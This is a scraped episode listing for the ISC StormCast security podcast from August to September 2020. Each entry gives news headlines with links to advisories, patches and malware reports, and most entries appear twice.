Citrix ADC Udpates https://support.citrix.com/article/CTX281474 Firefox Version 81 Released https://www.mozilla.org/en-US/firefox/81.0/releasenotes/ Simple Scan Drops Ransomware Risk https://www.accesswire.com/607018/Corvus-Updates-Scan-Technology-with-RDP-Detection-Slashes-Ransomware-Claims-by-65 iOS 14 Jailbreak https://checkra.in/news/2020/09/iOS-14-announcement
9/23/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, September 23rd 2020

Citrix ADC Udpates https://support.citrix.com/article/CTX281474 Firefox Version 81 Released https://www.mozilla.org/en-US/firefox/81.0/releasenotes/ Simple Scan Drops Ransomware Risk https://www.accesswire.com/607018/Corvus-Updates-Scan-Technology-with-RDP-Detection-Slashes-Ransomware-Claims-by-65 iOS 14 Jailbreak https://checkra.in/news/2020/09/iOS-14-announcement
9/23/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, September 22nd 2020

Slightly Broken Overlay Phishing https://isc.sans.edu/forums/diary/Slightly+broken+overlay+phishing/26586/ MacOS Code Injection via Third Party Frameworks https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks Snort/ClamAV Cobalt Strike Detection https://blog.talosintelligence.com/2020/09/coverage-strikes-back-cobalt-strike-paper.html#more
9/22/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, September 22nd 2020

Slightly Broken Overlay Phishing https://isc.sans.edu/forums/diary/Slightly+broken+overlay+phishing/26586/ MacOS Code Injection via Third Party Frameworks https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks Snort/ClamAV Cobalt Strike Detection https://blog.talosintelligence.com/2020/09/coverage-strikes-back-cobalt-strike-paper.html#more
9/22/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Monday, September 21st 2020

A Mix of Python and VBA in a Malicious Word Document https://isc.sans.edu/forums/diary/A+Mix+of+Python+VBA+in+a+Malicious+Word+Document/26578/ Salesforce Phish https://isc.sans.edu/forums/diary/Analysis+of+a+Salesforce+Phishing+Emails/26582/ Google App Engine Used in Phishing Attacks https://medium.com/@marcelx/attackers-are-abusing-googles-app-engine-to-circumvent-enterprise-security-solutions-again-eda8345d531d Sysmon Adds Clipboard Monitoring https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon Windows Defender No Longer Able to Download Files https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-windows-defender-ability-after-security-concerns/
9/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Monday, September 21st 2020

A Mix of Python and VBA in a Malicious Word Document https://isc.sans.edu/forums/diary/A+Mix+of+Python+VBA+in+a+Malicious+Word+Document/26578/ Salesforce Phish https://isc.sans.edu/forums/diary/Analysis+of+a+Salesforce+Phishing+Emails/26582/ Google App Engine Used in Phishing Attacks https://medium.com/@marcelx/attackers-are-abusing-googles-app-engine-to-circumvent-enterprise-security-solutions-again-eda8345d531d Sysmon Adds Clipboard Monitoring https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon Windows Defender No Longer Able to Download Files https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-windows-defender-ability-after-security-concerns/
9/21/20205 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, September 18th 2020

OSSEC Active Response https://isc.sans.edu/forums/diary/Suspicious+Endpoint+Containment+with+OSSEC/26576/ Microsoft Patch for Office for Mac https://docs.microsoft.com/en-us/officeupdates/release-notes-office-for-mac VMWare Fusion Vulnerablity https://www.vmware.com/security/advisories/VMSA-2020-0020.html NSA Secure Boot Configuration Guide https://media.defense.gov/2020/Sep/15/2002497594/-1/-1/0/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF Microsoft Edge Warns Users of Adobe Flash End of Support https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/
9/18/20205 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, September 18th 2020

OSSEC Active Response https://isc.sans.edu/forums/diary/Suspicious+Endpoint+Containment+with+OSSEC/26576/ Microsoft Patch for Office for Mac https://docs.microsoft.com/en-us/officeupdates/release-notes-office-for-mac VMWare Fusion Vulnerablity https://www.vmware.com/security/advisories/VMSA-2020-0020.html NSA Secure Boot Configuration Guide https://media.defense.gov/2020/Sep/15/2002497594/-1/-1/0/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF/CTR-UEFI-SECURE-BOOT-CUSTOMIZATION-20200915.PDF Microsoft Edge Warns Users of Adobe Flash End of Support https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/
9/18/20205 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, September 17th 2020

Most Recent "Mirai" Bot Includes Code to Target Backups https://isc.sans.edu/forums/diary/Do+Vulnerabilities+Ever+Get+Old+Recent+Mirai+Variant+Scanning+for+20+Year+Old+Amanda+Version/26572/ Apple Security Updates https://support.apple.com/en-us/HT201222
9/17/20205 minutes, 32 seconds
Episode Artwork

ISC StormCast for Thursday, September 17th 2020

Most Recent "Mirai" Bot Includes Code to Target Backups https://isc.sans.edu/forums/diary/Do+Vulnerabilities+Ever+Get+Old+Recent+Mirai+Variant+Scanning+for+20+Year+Old+Amanda+Version/26572/ Apple Security Updates https://support.apple.com/en-us/HT201222
9/17/20205 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, September 16th 2020

Traffic Analysis Quiz: Oh No... Another Infection https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Oh+No+Another+Infection/26566/ Magento 1 Stores Targeted By Recent Attack https://sansec.io/research/largest-magento-hack-to-date Adobe Media Encoder Patch https://helpx.adobe.com/security/products/media-encoder/apsb20-57.html Zerologin Reminder https://www.secura.com/pathtoimg.php?id=2055 Windows "Finger" Utility Abused http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
9/16/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, September 16th 2020

Traffic Analysis Quiz: Oh No... Another Infection https://isc.sans.edu/forums/diary/Traffic+Analysis+Quiz+Oh+No+Another+Infection/26566/ Magento 1 Stores Targeted By Recent Attack https://sansec.io/research/largest-magento-hack-to-date Adobe Media Encoder Patch https://helpx.adobe.com/security/products/media-encoder/apsb20-57.html Zerologin Reminder https://www.secura.com/pathtoimg.php?id=2055 Windows "Finger" Utility Abused http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt
9/16/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, September 15th 2020

Not Everything About ".well-known" is Well Known https://isc.sans.edu/forums/diary/Not+Everything+About+wellknown+is+Well+Known/26564/ BLE Lock Vulnerable to Replay Attack https://www.pentestpartners.com/security-blog/360lock-smart-lock-review/ Mobile Iron Exploit Released https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
9/15/20205 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, September 15th 2020

Not Everything About ".well-known" is Well Known https://isc.sans.edu/forums/diary/Not+Everything+About+wellknown+is+Well+Known/26564/ BLE Lock Vulnerable to Replay Attack https://www.pentestpartners.com/security-blog/360lock-smart-lock-review/ Mobile Iron Exploit Released https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
9/15/20205 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, September 14th 2020

Pillaging and Protecting the Clipboard https://isc.sans.edu/forums/diary/Whats+in+Your+Clipboard+Pillaging+and+Protecting+the+Clipboard/26556/ Critical Vulnerability in PANOS https://security.paloaltonetworks.com/CVE-2020-2040 Linux VoIP Softswitch Malware https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/ CVE-2020-1472 Zerologon Privilege Escalation Vulnerability https://www.secura.com/blog/zero-logon
9/14/20206 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, September 14th 2020

Pillaging and Protecting the Clipboard https://isc.sans.edu/forums/diary/Whats+in+Your+Clipboard+Pillaging+and+Protecting+the+Clipboard/26556/ Critical Vulnerability in PANOS https://security.paloaltonetworks.com/CVE-2020-2040 Linux VoIP Softswitch Malware https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/ CVE-2020-1472 Zerologon Privilege Escalation Vulnerability https://www.secura.com/blog/zero-logon
9/14/20206 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, September 11th 2020

Recent Dridex Activity https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/ Zoom Bombings and Zoom 2FA https://arxiv.org/abs/2009.03822 https://blog.zoom.us/secure-your-zoom-account-with-two-factor-authentication/ AMD Server CPUs May Be Locked to Particular Motherboard https://www.servethehome.com/amd-psb-vendor-locks-epyc-cpus-for-enhanced-security-at-a-cost/ BLURtooth Vulnerability https://www.bluetooth.com/learn-about-bluetooth/bluetooth-technology/bluetooth-security/blurtooth/
9/11/20207 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, September 11th 2020

Recent Dridex Activity https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/ Zoom Bombings and Zoom 2FA https://arxiv.org/abs/2009.03822 https://blog.zoom.us/secure-your-zoom-account-with-two-factor-authentication/ AMD Server CPUs May Be Locked to Particular Motherboard https://www.servethehome.com/amd-psb-vendor-locks-epyc-cpus-for-enhanced-security-at-a-cost/ BLURtooth Vulnerability https://www.bluetooth.com/learn-about-bluetooth/bluetooth-technology/bluetooth-security/blurtooth/
9/11/20207 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, September 10th 2020

MacOS 11 Network Traffic https://isc.sans.edu/forums/diary/A+First+Look+at+macOS+11+Big+Sur+Network+Traffic+New+Now+with+more+GREASE/26548/ Azure Offers Automatic Windows VM Patching https://azure.microsoft.com/en-us/updates/automatic-vm-guest-patching-now-in-preview/ WeaveScope Used to Attack Docker Infrastructure https://www.intezer.com/blog/cloud-workload-protection/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/
9/10/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, September 10th 2020

MacOS 11 Network Traffic https://isc.sans.edu/forums/diary/A+First+Look+at+macOS+11+Big+Sur+Network+Traffic+New+Now+with+more+GREASE/26548/ Azure Offers Automatic Windows VM Patching https://azure.microsoft.com/en-us/updates/automatic-vm-guest-patching-now-in-preview/ WeaveScope Used to Attack Docker Infrastructure https://www.intezer.com/blog/cloud-workload-protection/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/
9/10/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, September 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2020+Patch+Tuesday/26544/ Adobe Security Bulletins https://helpx.adobe.com/security.html Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html
9/9/20206 minutes, 36 seconds
Episode Artwork

ISC StormCast for Wednesday, September 9th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+September+2020+Patch+Tuesday/26544/ Adobe Security Bulletins https://helpx.adobe.com/security.html Intel Patches https://www.intel.com/content/www/us/en/security-center/default.html
9/9/20206 minutes, 36 seconds
Episode Artwork

ISC StormCast for Tuesday, September 8th 2020

A Blast From The Past: XXEncoded VB 6.0 Trojan https://isc.sans.edu/forums/diary/A+blast+from+the+past+XXEncoded+VB60+Trojan/26538/ Office: About OLE and ZIP Files https://isc.sans.edu/forums/diary/Office+About+OLE+and+ZIP+Files/26540/ Go XSS Vulnerability https://seclists.org/fulldisclosure/2020/Sep/5 "Baka" JavaScript Skimmer https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/visa-security-alert-baka-javascript-skimmer.pdf
9/8/20205 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, September 8th 2020

A Blast From The Past: XXEncoded VB 6.0 Trojan https://isc.sans.edu/forums/diary/A+blast+from+the+past+XXEncoded+VB60+Trojan/26538/ Office: About OLE and ZIP Files https://isc.sans.edu/forums/diary/Office+About+OLE+and+ZIP+Files/26540/ Go XSS Vulnerability https://seclists.org/fulldisclosure/2020/Sep/5 "Baka" JavaScript Skimmer https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/visa-security-alert-baka-javascript-skimmer.pdf
9/8/20205 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, September 4th 2020

Sandbox Evasion Using NTP https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534/ Android DNS over HTTPS https://blog.chromium.org/2020/09/a-safer-and-more-private-browsing.html Cisco Jabber Vulnerability Fullowup https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
9/4/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, September 4th 2020

Sandbox Evasion Using NTP https://isc.sans.edu/forums/diary/Sandbox+Evasion+Using+NTP/26534/ Android DNS over HTTPS https://blog.chromium.org/2020/09/a-safer-and-more-private-browsing.html Cisco Jabber Vulnerability Fullowup https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/
9/4/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, September 3rd 2020

Python and Risky Windows API Calls https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530/ QNAP Updates https://www.qnap.com/en/release-notes/qts/4.3.6.1411/20200825 https://www.qnap.com/en/release-notes/qts/4.4.3.1400/20200817 iOS 13.7 Update https://support.apple.com/en-us/HT201222 Cisco Jabber Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-UyTKCPGg MoFi Router Vulnerabilities https://www.criticalstart.com/critical-vulnerabilities-discovered-in-mofi-routers/
9/3/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, September 3rd 2020

Python and Risky Windows API Calls https://isc.sans.edu/forums/diary/Python+and+Risky+Windows+API+Calls/26530/ QNAP Updates https://www.qnap.com/en/release-notes/qts/4.3.6.1411/20200825 https://www.qnap.com/en/release-notes/qts/4.4.3.1400/20200817 iOS 13.7 Update https://support.apple.com/en-us/HT201222 Cisco Jabber Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-UyTKCPGg MoFi Router Vulnerabilities https://www.criticalstart.com/critical-vulnerabilities-discovered-in-mofi-routers/
9/3/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, September 2nd 2020

Exposed Domain Controllers Used in DDoS Attacks https://isc.sans.edu/forums/diary/Exposed+Windows+Domain+Controllers+Used+in+CLDAP+DDoS+Attacks/26526/ Microsoft Reviving SHA-1 https://techcommunity.microsoft.com/t5/microsoft-security-baselines/security-baseline-for-microsoft-edge-version-85/ba-p/1618585 Trend Micro Updating Anti Malware Products https://success.trendmicro.com/solution/000263632 Public Voter Data Sold as "Breach" https://www.cyberscoop.com/russia-hack-michigan-voter-data-kommersant/
9/2/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, September 2nd 2020

Exposed Domain Controllers Used in DDoS Attacks https://isc.sans.edu/forums/diary/Exposed+Windows+Domain+Controllers+Used+in+CLDAP+DDoS+Attacks/26526/ Microsoft Reviving SHA-1 https://techcommunity.microsoft.com/t5/microsoft-security-baselines/security-baseline-for-microsoft-edge-version-85/ba-p/1618585 Trend Micro Updating Anti Malware Products https://success.trendmicro.com/solution/000263632 Public Voter Data Sold as "Breach" https://www.cyberscoop.com/russia-hack-michigan-voter-data-kommersant/
9/2/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, September 1st 2020

Finding The Original Maldoc https://isc.sans.edu/forums/diary/Finding+The+Original+Maldoc/26520/ Slack Remote Code Execution https://hackerone.com/reports/783877 Apple Approved Malware https://objective-see.com/blog/blog_0x4E.html Cisco IOS XR Bug Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz
9/1/20205 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, September 1st 2020

Finding The Original Maldoc https://isc.sans.edu/forums/diary/Finding+The+Original+Maldoc/26520/ Slack Remote Code Execution https://hackerone.com/reports/783877 Apple Approved Malware https://objective-see.com/blog/blog_0x4E.html Cisco IOS XR Bug Exploited https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dvmrp-memexh-dSmpdvfz
9/1/20205 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, August 31st 2020

CenturyLink Outage https://blog.cloudflare.com/analysis-of-todays-centurylink-level-3-outage/ New Zealand Stock Market Denial of Service Attack https://www.theregister.com/2020/08/27/nzx_ddos_third_day/ Pulse Connect Secure RCE Patch https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/
8/31/20207 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, August 31st 2020

CenturyLink Outage https://blog.cloudflare.com/analysis-of-todays-centurylink-level-3-outage/ New Zealand Stock Market Denial of Service Attack https://www.theregister.com/2020/08/27/nzx_ddos_third_day/ Pulse Connect Secure RCE Patch https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/
8/31/20207 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, August 28th 2020

A Reminder about Security.txt https://isc.sans.edu/forums/diary/Securitytxt+one+small+file+for+an+admin+one+giant+help+to+a+security+researcher/26510/ DNS Queries to Root Name Servers https://blog.apnic.net/2020/08/21/chromiums-impact-on-root-dns-traffic/ https://www.zdnet.com/article/chromium-dns-hijacking-detection-accused-of-being-around-half-of-all-root-queries/ Microsoft Extends Windows 10 1803 Deadline https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet LemonDuck Adding New Tricks https://news.sophos.com/en-us/2020/08/25/lemon_duck-cryptominer-targets-cloud-apps-linux/
8/28/20207 minutes, 9 seconds
Episode Artwork

ISC StormCast for Friday, August 28th 2020

A Reminder about Security.txt https://isc.sans.edu/forums/diary/Securitytxt+one+small+file+for+an+admin+one+giant+help+to+a+security+researcher/26510/ DNS Queries to Root Name Servers https://blog.apnic.net/2020/08/21/chromiums-impact-on-root-dns-traffic/ https://www.zdnet.com/article/chromium-dns-hijacking-detection-accused-of-being-around-half-of-all-root-queries/ Microsoft Extends Windows 10 1803 Deadline https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet LemonDuck Adding New Tricks https://news.sophos.com/en-us/2020/08/25/lemon_duck-cryptominer-targets-cloud-apps-linux/
8/28/20207 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, August 27th 2020

Malicious Excel Sheet with a NULL VT Score https://isc.sans.edu/forums/diary/Malicious+Excel+Sheet+with+a+NULL+VT+Score/26506/ APT Attack Uses Autodesk Plugin https://www.bitdefender.com/files/News/CaseStudies/study/365/Bitdefender-PR-Whitepaper-APTHackers-creat4740-en-EN-GenericUse.pdf Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-36/ Arrest in Insider Attack https://www.justice.gov/opa/press-release/file/1308766/download
8/27/20205 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, August 27th 2020

Malicious Excel Sheet with a NULL VT Score https://isc.sans.edu/forums/diary/Malicious+Excel+Sheet+with+a+NULL+VT+Score/26506/ APT Attack Uses Autodesk Plugin https://www.bitdefender.com/files/News/CaseStudies/study/365/Bitdefender-PR-Whitepaper-APTHackers-creat4740-en-EN-GenericUse.pdf Firefox Update https://www.mozilla.org/en-US/security/advisories/mfsa2020-36/ Arrest in Insider Attack https://www.justice.gov/opa/press-release/file/1308766/download
8/27/20205 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, August 26th 2020

Keep an Eye on LOLBins https://isc.sans.edu/forums/diary/Keep+An+Eye+on+LOLBins/26502/ Malicious iOS Adnetwork SDK https://snyk.io/research/sour-mint-malicious-sdk/ Apache Update https://httpd.apache.org/security/vulnerabilities_24.html Google Chrome User-Agent Client Hints https://web.dev/user-agent-client-hints/
8/26/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, August 26th 2020

Keep an Eye on LOLBins https://isc.sans.edu/forums/diary/Keep+An+Eye+on+LOLBins/26502/ Malicious iOS Adnetwork SDK https://snyk.io/research/sour-mint-malicious-sdk/ Apache Update https://httpd.apache.org/security/vulnerabilities_24.html Google Chrome User-Agent Client Hints https://web.dev/user-agent-client-hints/
8/26/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, August 25th 2020

Tracking a Malware Campaign Through VT https://isc.sans.edu/forums/diary/Tracking+A+Malware+Campaign+Through+VT/26498/ Zoom Outage https://www.cnn.com/2020/08/24/us/zoom-outage-worldwide-trnd/index.html RDP Remains a Top Target https://www.group-ib.com/media/iran-cybercriminals/?utm_source=bleeping_computer&utm_medium=article&utm_campaign=referral Microsoft Introduces Application Guard https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide Safari File Sharing Bug https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html
8/25/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, August 25th 2020

Tracking a Malware Campaign Through VT https://isc.sans.edu/forums/diary/Tracking+A+Malware+Campaign+Through+VT/26498/ Zoom Outage https://www.cnn.com/2020/08/24/us/zoom-outage-worldwide-trnd/index.html RDP Remains a Top Target https://www.group-ib.com/media/iran-cybercriminals/?utm_source=bleeping_computer&utm_medium=article&utm_campaign=referral Microsoft Introduces Application Guard https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/install-app-guard?view=o365-worldwide Safari File Sharing Bug https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html
8/25/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, August 24th 2020

A Word of Caution: Helping Cyber Stalking Victims https://isc.sans.edu/forums/diary/A+Word+of+Caution+Helping+Out+People+Being+Stalked+Online/26422/ RDP and Telnet Scans https://isc.sans.edu/forums/diary/Remote+Desktop+TCP3389+and+Telnet+TCP23+What+might+they+have+in+Common/26492/ Thales Cinterion Input Validation Vulnerability https://www.thalesgroup.com/en/markets/digital-identity-and-security/iot/resources/security-updates-cinterion-iot-modules Google Drive File Extension Spoofing https://thehackernews.com/2020/08/google-drive-file-versions.html
8/24/20206 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, August 24th 2020

A Word of Caution: Helping Cyber Stalking Victims https://isc.sans.edu/forums/diary/A+Word+of+Caution+Helping+Out+People+Being+Stalked+Online/26422/ RDP and Telnet Scans https://isc.sans.edu/forums/diary/Remote+Desktop+TCP3389+and+Telnet+TCP23+What+might+they+have+in+Common/26492/ Thales Cinterion Input Validation Vulnerability https://www.thalesgroup.com/en/markets/digital-identity-and-security/iot/resources/security-updates-cinterion-iot-modules Google Drive File Extension Spoofing https://thehackernews.com/2020/08/google-drive-file-versions.html
8/24/20206 minutes, 59 seconds
Episode Artwork

ISC StormCast for Friday, August 21st 2020

Office 365 Mail Forwarding Rules (and other Mail Rules too) https://isc.sans.edu/forums/diary/Office+365+Mail+Forwarding+Rules+and+other+Mail+Rules+too/26484/ Spoofing GMail/GSuite Customers https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/ Microsoft Updates DisableAntiSpyware Registry Key https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware Acoustic Based Physical Key Inference https://www.comp.nus.edu.sg/~junhan/papers/SpiKey_HotMobile20_CamReady.pdf
8/21/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, August 21st 2020

Office 365 Mail Forwarding Rules (and other Mail Rules too) https://isc.sans.edu/forums/diary/Office+365+Mail+Forwarding+Rules+and+other+Mail+Rules+too/26484/ Spoofing GMail/GSuite Customers https://ezh.es/blog/2020/08/the-confused-mailman-sending-spf-and-dmarc-passing-mail-as-any-gmail-or-g-suite-customer/ Microsoft Updates DisableAntiSpyware Registry Key https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware Acoustic Based Physical Key Inference https://www.comp.nus.edu.sg/~junhan/papers/SpiKey_HotMobile20_CamReady.pdf
8/21/20206 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, August 20th 2020

Example of a Word Document Delivering Qakbot https://isc.sans.edu/forums/diary/Example+of+Word+Document+Delivering+Qakbot/26482/ PGP/SMime Implementation Weaknesses https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2020/08/15/mailto-paper.pdf Windows 8.1 / 2012 Special Patch https://support.microsoft.com/en-us/help/4578013/security-update-for-windows-8-1-rt-8-1-and-server-2012-r2 Fileless Cryptomining Worm https://www.helpnetsecurity.com/2020/08/19/fileless-worm-p2p-botnet/
8/20/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, August 20th 2020

Example of a Word Document Delivering Qakbot https://isc.sans.edu/forums/diary/Example+of+Word+Document+Delivering+Qakbot/26482/ PGP/SMime Implementation Weaknesses https://www.nds.ruhr-uni-bochum.de/media/nds/veroeffentlichungen/2020/08/15/mailto-paper.pdf Windows 8.1 / 2012 Special Patch https://support.microsoft.com/en-us/help/4578013/security-update-for-windows-8-1-rt-8-1-and-server-2012-r2 Fileless Cryptomining Worm https://www.helpnetsecurity.com/2020/08/19/fileless-worm-p2p-botnet/
8/20/20206 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, August 19th 2020

Using APIs to Track Attackers https://isc.sans.edu/forums/diary/Using+APIs+to+Track+Attackers/26472/ Jenkins Security Advisory https://www.jenkins.io/security/advisory/2020-08-17/ Chrome Will Warn of Insecure Forms https://blog.chromium.org/2020/08/protecting-google-chrome-users-from.html Reminder: September 1st Certificate Expiration Change https://www.ssl.com/blogs/398-day-browser-limit-for-ssl-tls-certificates-begins-september-1-2020/ Cryptojacking Worm Steals AWS Credentials https://www.helpnetsecurity.com/2020/08/18/worm-steals-aws-credentials/
8/19/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, August 19th 2020

Using APIs to Track Attackers https://isc.sans.edu/forums/diary/Using+APIs+to+Track+Attackers/26472/ Jenkins Security Advisory https://www.jenkins.io/security/advisory/2020-08-17/ Chrome Will Warn of Insecure Forms https://blog.chromium.org/2020/08/protecting-google-chrome-users-from.html Reminder: September 1st Certificate Expiration Change https://www.ssl.com/blogs/398-day-browser-limit-for-ssl-tls-certificates-begins-september-1-2020/ Cryptojacking Worm Steals AWS Credentials https://www.helpnetsecurity.com/2020/08/18/worm-steals-aws-credentials/
8/19/20205 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, August 18th 2020

Apache Struts Patch and PoC Exploit https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability https://cwiki.apache.org/confluence/display/WW/S2-059 Emotet Bug Used to Inoculate Systems https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/
8/18/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, August 18th 2020

Apache Struts Patch and PoC Exploit https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability https://cwiki.apache.org/confluence/display/WW/S2-059 Emotet Bug Used to Inoculate Systems https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/
8/18/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, August 17th 2020

SANS Data Incident 2020 - Indicators of Compromise https://www.sans.org/blog/sans-data-incident-2020-indicators-of-compromise/ Large File Used to Obfuscate Malware https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/ Mac Malware Spreading via XCode https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf Citrix Broker Service Detected as Trojan by Windows Defender https://support.citrix.com/article/CTX279897
8/17/20204 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, August 17th 2020

SANS Data Incident 2020 - Indicators of Compromise https://www.sans.org/blog/sans-data-incident-2020-indicators-of-compromise/ Large File Used to Obfuscate Malware https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/ Mac Malware Spreading via XCode https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf Citrix Broker Service Detected as Trojan by Windows Defender https://support.citrix.com/article/CTX279897
8/17/20204 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, August 14th 2020

Decrypting Voice over LTE Calls https://revolte-attack.net/ Vulnerabilities found on Amazon's Alexa https://research.checkpoint.com/2020/amazons-alexa-hacked/ DROVORUB Russian GRU Linux Malware https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
8/14/20208 minutes, 27 seconds
Episode Artwork

ISC StormCast for Friday, August 14th 2020

Decrypting Voice over LTE Calls https://revolte-attack.net/ Vulnerabilities found on Amazon's Alexa https://research.checkpoint.com/2020/amazons-alexa-hacked/ DROVORUB Russian GRU Linux Malware https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
8/14/20208 minutes, 27 seconds
Episode Artwork

ISC StormCast for Thursday, August 13th 2020

